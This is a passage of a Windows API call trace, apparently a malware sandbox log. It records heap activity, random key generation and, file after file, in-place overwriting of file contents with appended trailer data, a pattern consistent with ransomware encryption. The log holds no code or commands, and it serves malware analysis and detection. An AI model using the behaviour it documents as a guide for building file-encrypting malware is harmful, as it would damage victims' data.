lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.788] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.788] GetProcessHeap () returned 0x280000 [0074.789] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.789] GetProcessHeap () returned 0x280000 [0074.789] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.789] GetProcessHeap () returned 0x280000 [0074.789] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0074.789] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.789] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.789] WriteFile (in: hFile=0x7a8, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.789] GetProcessHeap () returned 0x280000 [0074.789] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0074.789] GetProcessHeap () returned 0x280000 [0074.789] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0074.789] GetProcessHeap () returned 0x280000 [0074.789] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0074.789] CloseHandle (hObject=0x7a8) returned 1 [0074.790] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 6 [0074.791] SetFilePointerEx (in: hFile=0x7bc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.791] ReadFile (in: hFile=0x7bc, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.791] SetFilePointerEx (in: hFile=0x7bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.791] GetProcessHeap () returned 0x280000 [0074.791] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0074.791] GetProcessHeap () returned 0x280000 [0074.791] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0074.791] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0074.791] GetProcessHeap () returned 0x280000 [0074.791] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0074.791] ReadFile (in: hFile=0x7bc, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0074.848] SetFilePointerEx (in: hFile=0x7bc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.848] WriteFile (in: hFile=0x7bc, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.849] GetProcessHeap () returned 0x280000 [0074.849] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.850] GetProcessHeap () returned 0x280000 [0074.850] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.850] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xf8) returned 0x7d42ef8 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x1e8) returned 0x7dc1440 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d42ef8 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.851] GetProcessHeap () returned 0x280000 [0074.851] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.851] GetProcessHeap () returned 0x280000 [0074.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.852] GetProcessHeap () returned 0x280000 [0074.852] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.852] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0074.853] SetFilePointerEx (in: hFile=0x7bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.853] WriteFile (in: hFile=0x7bc, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.853] WriteFile (in: hFile=0x7bc, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.853] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0074.853] GetProcessHeap () returned 0x280000 [0074.854] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0074.854] GetProcessHeap () returned 0x280000 [0074.854] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0074.854] CloseHandle (hObject=0x7bc) returned 1 [0074.855] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 7 [0074.855] SetFilePointerEx (in: hFile=0x7c0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.855] ReadFile (in: hFile=0x7c0, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.855] SetFilePointerEx (in: hFile=0x7c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.855] GetProcessHeap () returned 0x280000 [0074.855] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0074.855] GetProcessHeap () returned 0x280000 [0074.855] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0074.855] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0074.855] GetProcessHeap () returned 0x280000 [0074.855] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0074.855] ReadFile (in: hFile=0x7c0, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x752fd08*=0x493, lpOverlapped=0x0) returned 1 [0074.917] SetFilePointerEx (in: hFile=0x7c0, liDistanceToMove=0xfffffb6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.917] WriteFile (in: hFile=0x7c0, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x752fd44*=0x493, lpOverlapped=0x0) returned 1 [0074.917] GetProcessHeap () returned 0x280000 [0074.917] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.917] GetProcessHeap () returned 0x280000 [0074.917] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.917] GetProcessHeap () returned 0x280000 [0074.917] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3d8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.918] GetProcessHeap () returned 0x280000 [0074.918] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.918] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, 